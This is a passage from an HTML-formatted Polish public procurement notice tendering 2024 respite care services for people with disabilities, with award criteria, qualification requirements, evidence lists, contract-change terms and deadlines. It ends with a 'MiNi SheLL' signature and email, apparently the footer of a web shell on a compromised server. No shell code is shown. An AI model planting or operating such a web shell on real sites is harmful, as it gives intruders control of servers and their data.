Programu „Opieka wytchnieniowa” dla Jednostek Samorządu Terytorialnego – edycja 2024, może się odbywać w placówce/placówkach wskazanej/-ych w części V ust. 6 pkt 2: lit. c, lit. f, lit. g oraz lit. i ww. Programu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</p> <p class="mb-0">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami oceny ofert: <br/>1)	Cena (C) –waga 60,00 punktów <br/>2)	Gotowość (G) – waga 40,00 punktów. <br/>2.	Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska najwyższą łączną liczbę punktów za wszystkie kryteria oceny ofert wg wzoru LP = C +G, gdzie: <br/>LP - to całkowita liczba punktów przyznana ofercie, <br/>C - liczba punktów przyznana ofercie za kryterium „Cena”, <br/>G – to liczba punktów przyznana ofercie za kryterium „Gotowość”.<br/>Końcowy wynik zostanie zaokrąglony do dwóch miejsc po przecinku. <br/>3.	Ocenie będą podlegały oferty nieodrzucone, zgodnie z zasadami określonymi w rozdziale XV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gotowość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek dot. zdolności technicznej lub zawodowej – Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że będzie dysponował przez cały okres realizacji tej części zamówienia co najmniej dwiema osobami, skierowanymi przez Wykonawcę do realizacji zamówienia, z których każda będzie posiadała łącznie udokumentowane co najmniej: 6-miesięczne doświadczenie w udzielaniu bezpośredniej pomocy osobom z niepełnosprawnościami oraz wykształcenie lub uprawnienia w jednym z zawodów: asystent osoby niepełnosprawnej lub pielęgniarka lub siostra PCK lub opiekun osoby starszej lub opiekun medyczny lub pedagog lub psycholog lub terapeuta zajęciowy lub fizjoterapeuta; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Od wykonawcy, którego oferta zostanie najwyżej oceniona, na wezwanie zamawiającego o którym mowa w art. 274 ust. 1 PZP, w celu wykazania minimalnych zdolności, będzie wymagane przedłożenie podmiotowego środka dowodowego w postaci wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, tj. wykształcenia, uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, wraz z informacją o podstawie do dysponowania tymi osobami. Wzór wykazu zawarto w załączniku nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1)	W przypadku części I oraz części II niniejszego zamówienia publicznego, Zamawiający wymaga złożenia przedmiotowych środków dowodowych w postaci: dokumentu lub dokumentów potwierdzających dane zawarte w złożonej ofercie, tj. odpowiednio:<br/>a)	status ośrodka wsparcia, o którym mowa w części V ust. 6 pkt 2 lit. c Programu, tj. ośrodku o którym stanowi art. 51 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U. z 2023 r. poz. 901 ze zm.) (jeśli dotyczy);<br/>b)	zezwolenie/ decyzja wojewody na prowadzenie domu pomocy społecznej przez podmioty niepubliczne, o których mowa w art. 57 ust. 1 pkt 2-4 ustawy z dnia 12 marca 2004 r. o pomocy społecznej, a wskazanego w części V ust. 6 pkt 2 lit. f Programu (jeśli dotyczy);<br/>c)	zezwolenie / decyzja wojewody na prowadzenia placówki zapewniającej całodobową opiekę, o której mowa w ustawie z dnia z dnia 12 marca 2004 r. o pomocy społecznej, a wskazanej w części V ust. 6 pkt 2 lit. g Programu (jeśli dotyczy);<br/>d)	pisemna uprzednia zgoda gminy/powiatu zezwalająca/potwierdzająca, że miejsce świadczenia usług opieki wytchnieniowej w ramach pobytu całodobowego, wskazane w ofercie Wykonawcy, spełnia kryteria dostępności, o których mowa w ustawie z dnia z 19 lipca 2019 r. o zapewnieniu dostępności osobom ze szczególnymi potrzebami, a wskazanego w części V ust. 6 pkt 2 lit. i Programu (jeśli dotyczy).<br/>Zamawiający dopuszcza złożenie przedmiotowych środków dowodowych w postaci innych dokumentów równoważnych względem wyżej wymienionych, o ile będą wystawione w postaci dokumentu urzędowego jednostki samorządu terytorialnego lub wyciągu z aktualnych baz publicznie dostępnych rejestrów/wykazów instytucji niezależnych od Wykonawcy oraz będą potwierdzały status wymaganego miejsca realizacji zamówienia.<br/>Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym przez siebie terminie, o ile złożona oferta nie będzie podlegała odrzuceniu albo nie zajdą przesłanki unieważnienia postępowania; <br/>2)	w zakresie części I zamówienia: oświadczenie Wykonawcy potwierdzające dane lub deklaracje zawarte w złożonej przez Wykonawcę ofercie w zakresie zatrudnienia, o którym mowa w Rozdziale III ust. 40 SWZ, osoby/osób wykonującej czynności związane ze sprawowaniem bezpośredniej opieki nad osobami z niepełnosprawnościami. Z zastrzeżeniem, że w przypadku osób bezrobotnych oraz poszukujących pracy, oprócz oświadczenia Wykonawcy będzie wymagany także dokument z właściwego urzędu pracy o utracie statusu bezrobotnego/poszukującego pracy przez osobę wskazaną przez Wykonawcę. Wzór oświadczenia zawarto w załączniku nr 8 do SWZ;<br/>3)	w zakresie części II zamówienia: oświadczenie Wykonawcy potwierdzające dane lub deklaracje zawarte w złożonej przez Wykonawcę ofercie w zakresie zatrudnienia, o którym mowa w Rozdziale III ust. 41 SWZ, osoby/osób wykonującej czynności związane ze sprawowaniem bezpośredniej opieki nad osobami z niepełnosprawnościami. Z zastrzeżeniem, że w przypadku osób bezrobotnych oraz poszukujących pracy, oprócz oświadczenia Wykonawcy będzie wymagany także dokument z właściwego urzędu pracy o utracie statusu bezrobotnego/poszukującego pracy przez osobę wskazaną przez Wykonawcę. Wzór oświadczenia zawarto w załączniku nr 9 do SWZ.<br/>Wykonawca składa wymagane przedmiotowe środki dowodowe wraz z ofertą. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym przez siebie terminie, o ile złożona oferta nie będzie podlegała odrzuceniu albo nie zajdą przesłanki unieważnienia postępowania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1)	W przypadku części I oraz części II niniejszego zamówienia publicznego, Zamawiający wymaga złożenia przedmiotowych środków dowodowych w postaci: dokumentu lub dokumentów potwierdzających dane zawarte w złożonej ofercie, tj. odpowiednio:<br/>a)	status ośrodka wsparcia, o którym mowa w części V ust. 6 pkt 2 lit. c Programu, tj. ośrodku o którym stanowi art. 51 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U. z 2023 r. poz. 901 ze zm.) (jeśli dotyczy);<br/>b)	zezwolenie/decyzja wojewody na prowadzenie domu pomocy społecznej przez podmioty niepubliczne, o których mowa w art. 57 ust. 1 pkt 2-4 ustawy z dnia 12 marca 2004 r. o pomocy społecznej, a wskazanego w części V ust. 6 pkt 2 lit. f Programu (jeśli dotyczy);<br/>c)	zezwolenie/decyzja wojewody na prowadzenia placówki zapewniającej całodobową opiekę, o której mowa w ustawie z dnia z dnia 12 marca 2004 r. o pomocy społecznej, a wskazanej w części V ust. 6 pkt 2 lit. g Programu (jeśli dotyczy);<br/>d)	pisemna uprzednia zgoda gminy/powiatu zezwalająca/potwierdzająca, że miejsce świadczenia usług opieki wytchnieniowej w ramach pobytu całodobowego, wskazane w ofercie Wykonawcy, spełnia kryteria dostępności, o których mowa w ustawie z dnia z 19 lipca 2019 r. o zapewnieniu dostępności osobom ze szczególnymi potrzebami, a wskazanego w części V ust. 6 pkt 2 lit. i Programu (jeśli dotyczy).<br/>Zamawiający dopuszcza złożenie przedmiotowych środków dowodowych w postaci innych dokumentów równoważnych względem wyżej wymienionych, o ile będą wystawione w postaci dokumentu urzędowego jednostki samorządu terytorialnego lub wyciągu z aktualnych baz publicznie dostępnych rejestrów/wykazów instytucji niezależnych od Wykonawcy oraz będą potwierdzały status wymaganego miejsca realizacji zamówienia.<br/>Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym przez siebie terminie, o ile złożona oferta nie będzie podlegała odrzuceniu albo nie zajdą przesłanki unieważnienia postępowania; <br/>2)	w zakresie części I zamówienia: oświadczenie Wykonawcy potwierdzające dane lub deklaracje zawarte w złożonej przez Wykonawcę ofercie w zakresie zatrudnienia, o którym mowa w Rozdziale III ust. 40 SWZ, osoby/osób wykonującej czynności związane ze sprawowaniem bezpośredniej opieki nad osobami z niepełnosprawnościami. Z zastrzeżeniem, że w przypadku osób bezrobotnych oraz poszukujących pracy, oprócz oświadczenia Wykonawcy będzie wymagany także dokument z właściwego urzędu pracy o utracie statusu bezrobotnego/poszukującego pracy przez osobę wskazaną przez Wykonawcę. Wzór oświadczenia zawarto w załączniku nr 8 do SWZ;<br/>3)	w zakresie części II zamówienia: oświadczenie Wykonawcy potwierdzające dane lub deklaracje zawarte w złożonej przez Wykonawcę ofercie w zakresie zatrudnienia, o którym mowa w Rozdziale III ust. 41 SWZ, osoby/osób wykonującej czynności związane ze sprawowaniem bezpośredniej opieki nad osobami z niepełnosprawnościami. Z zastrzeżeniem, że w przypadku osób bezrobotnych oraz poszukujących pracy, oprócz oświadczenia Wykonawcy będzie wymagany także dokument z właściwego urzędu pracy o utracie statusu bezrobotnego/poszukującego pracy przez osobę wskazaną przez Wykonawcę. Wzór oświadczenia zawarto w załączniku nr 9 do SWZ.<br/>Wykonawca składa wymagane przedmiotowe środki dowodowe wraz z ofertą. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym przez siebie terminie, o ile złożona oferta nie będzie podlegała odrzuceniu albo nie zajdą przesłanki unieważnienia postępowania. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Formularz ofertowy, którego wzór stanowi załącznik nr 1 do SWZ; <br/>2)	Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, składane na podstawie art. 125 ust. 1 PZP. Wzory oświadczeń zawarto odpowiednio w załączniku nr 2 i załączniku nr 3 do SWZ; <br/>3)	Odpis lub informację z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. <br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzedzającym, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów (np. pełną nazwę, NIP, REGON, itp.). <br/>Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z KRS lub CEIDG lub innego właściwego rejestru, Zamawiający może żądać od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy lub odpowiednio: do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP lub Podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach; <br/>4) Pełnomocnictwo upoważniające do złożenia oferty (jeśli dotyczy); <br/>5) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - o ile ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie zamówienia np. konsorcjum, spółki cywilne (jeśli dotyczy); <br/>6)	Zobowiązanie podmiotu udostępniającego zasoby, na których zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną Wykonawca się powołuje w celu potwierdzenia spełniania warunków udziału w postępowaniu (jeśli dotyczy). Wzór zobowiązania zawarto w załączniku nr 4 do SWZ (jeśli dotyczy); <br/>7)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, o którym mowa w art. 117 ust. 4 PZP (jeśli dotyczy). Wzór oświadczenia zawarto w załączniku nr 6 do SWZ; <br/>8) Informacje dot. tajemnicy przedsiębiorstwa wraz z uzasadnieniem zastrzeżenia informacji znajdujących się w ofercie, w tym spełniania przesłanek określonych w art. 11 ust. 2 ustawy o zwalczaniu nieuczciwej konkurencji (jeśli dotyczy),<br/>9) Oświadczenie o braku podstaw wykluczenia składane na podstawie art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz. 507) - oświadczenie zawarto odpowiednio w załączniku nr 2 i 3 SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Brak podstaw wykluczenia określonych w: art. 108 ust. 1 PZP, art. 109 ust. 1 pkt 4 PZP, art. 109 ust. 1 pkt 8 PZP, art. 109 ust. 1 pkt 10 PZP oraz w art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego musi potwierdzić każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Sposób spełniania przez wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków udziału w postępowaniu, w zakresie części I oraz części II: <br/>1)	warunek dotyczący zdolności do występowania w obrocie gospodarczym, o którym mowa w art. 112 ust. 2 pkt 1 PZP – nie dotyczy, <br/>2)	warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 PZP – nie dotyczy, <br/>3)	warunek dotyczący sytuacji ekonomicznej lub finansowej, o którym mowa w art. 112 ust. 2 pkt 3 PZP – nie dotyczy, <br/>4)	warunek dotyczący zdolności technicznej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 4 PZP – tj. warunek określony w rozdziale XI ust. 2 pkt 4 SWZ oraz w Rozdziale XI ust. 3 pkt 4 SWZ (warunek dotyczący wykształcenia, uprawnień i doświadczenia osób skierowanych do realizacji zamówienia), musi spełnić samodzielnie co najmniej jeden z Wykonawców lub wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia łącznie.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>W przypadku, o którym mowa w art. 117 ust. 3 PZP, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia zawarto w załączniku nr 5 do SWZ. <br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 PZP, składa każdy z Wykonawców oddzielnie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Wzór oświadczenia zawarto w załączniku nr 2 do SWZ. <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, składając stosowne pełnomocnictwo. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określono w Załączniku nr 6 do SWZ.<br/>Strony ustalają, że zmianie mogą podlegać w szczególności postanowienia dotyczące:<br/>1)	terminów: obowiązywania niniejszej umowy w przypadku cofnięcia dofinansowania lub jego wstrzymania, terminów i formy płatności wynagrodzenia Wykonawcy,<br/>2)	wynagrodzenia Wykonawcy, w przypadku: <br/>a)	zmian w realizowanym Programie do wysokości środków finansowych posiadanych przez Zamawiającego po uprzednio przeprowadzonych negocjacjach,<br/>b)	gdy Zamawiający zostanie do tego zmuszony wskutek postanowień/orzeczeń sądów lub innych aktów prawnych,<br/>c)	wynagrodzenia Wykonawcy związane ze zwiększeniem lub zmniejszeniem liczby odbiorców OW lub zwiększeniem lub zmniejszeniem zakresu, częstotliwości lub liczby dób świadczenia usług,<br/>3)	wzorów załączników do umowy,<br/>4)	wykazu osób skierowanych do realizacji przedmiotu umowy,<br/>5)	zmiany osoby wyznaczonej do kontaktów z drugą Stroną,<br/>6)	zaistnienia okoliczności leżących po stronie Zamawiającego w szczególności spowodowanych problemami z jego zdolnością płatniczą lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy,<br/>7)	zmiany powszechnie obowiązujących przepisów prawa lub warunków Programu Opieka Wytchnieniowa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia Stron,<br/>8)	zmiany osób i podmiotów zdolnych do wykonywania zamówienia, w przypadku zdarzeń losowych niezależnych od Wykonawcy, po uzyskaniu zgody Zamawiającego,<br/>9)	uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,<br/>10)	zwiększeniem lub zmniejszeniem zakresu, częstotliwości świadczenia usług,<br/>11)	konieczności zmiany umowy spowodowanej okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć, a które mają wpływ na należytą realizację umowy,<br/>12)	okoliczności niezależnych od Stron, gdzie wartość zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie,<br/>13)	gdy Wykonawcę musi zastąpić nowy Wykonawca, w wyniku połączenia, podziału, przekształcenia, sukcesji, zmiany formy prawnej, upadłości, restrukturyzacji lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy,<br/>14)	podjęcie przez Wykonawcę decyzji o powierzeniu podwykonawcy/com realizacji części zamówienia, która miała być zrealizowana siłami własnymi Wykonawcy i/lub decyzji o rezygnacji z planowanego podwykonawstwa na rzecz wykonania części zamówienia siłami własnymi Wykonawcy i/lub decyzji o zmianie/rezygnacji z podwykonawcy – zmiana zakresu podwykonawstwa, z zastrzeżeniem art. 462 ust. 3 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych,<br/>15)	gdy wykonanie umowy wynika ze zmiennych potrzeb Zamawiającego, czego nie można było wcześniej przewidzieć, zakres umowy może zostać zmieniony przez Zamawiającego bez skutków finansowych i prawnych dla Zamawiającego,<br/>16)	gdy zajdzie konieczność przedłużenia terminu obowiązywania umowy, nie dłużej jednak niż o 3 miesiące,<br/>17)	gdy zmianie ulegną przepisy prawa powszechnego mające wpływ na wykonanie przedmiotu umowy,<br/>18)	zmiany terminów i warunków wydanych decyzji dotyczących przyznania Zamawiającemu środków zewnętrznych, a także ich wstrzymania lub cofnięcia przez instytucję je przyznające, a które są jedynym źródłem finansowania przedmiotu niniejszej umowy,<br/>19)	powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów - w takim zakresie w jakim będzie to niezbędne w celu dostosowania postanowień Umowy do zaistniałego stanu prawnego lub faktycznego;<br/>20) (...) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Strona internetowa prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-20 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie jest finansowane w ramach Programu Ministerstwa Rodziny i Polityki Społecznej pn. „Opieka wytchnieniowa dla Jednostek Samorządu Terytorialnego - edycja 2024”, finansowanego ze środków Funduszu Solidarnościowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com